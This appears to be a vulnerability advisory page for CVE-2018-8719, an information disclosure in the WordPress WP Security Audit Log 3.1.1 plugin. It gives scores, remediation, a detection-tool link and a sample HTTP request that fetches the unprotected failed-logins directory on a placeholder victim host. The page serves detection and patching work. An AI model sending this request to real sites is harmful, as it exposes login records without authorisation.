🔙 목록으로 돌아가기

CVE-2018-8719: WordPress WP Security Audit Log 3.1.1 - Information Disclosure

TitleWordPress WP Security Audit Log 3.1.1 - Information Disclosure
AuthorLogicalHunter
SeverityMedium
ImpactAn attacker can exploit this vulnerability to gain sensitive information from the WordPress WP Security Audit Log plugin.
RemediationUpdate to the latest version of WordPress WP Security Audit Log plugin (3.1.2 or higher) to fix the information disclosure vulnerability.
CVSS Score5.3
EPSS Score0.1532
CVE IDCVE-2018-8719
CWE IDCWE-532
Tags cve cve2018 exposure edb wordpress wp-plugin wpsecurityauditlog vuln

🔍 Vulnerability Description

WordPress WP Security Audit Log 3.1.1 plugin is susceptible to information disclosure. Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /wp-content/uploads/wp-security-audit-log/failed-logins/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-8719.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-8719.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A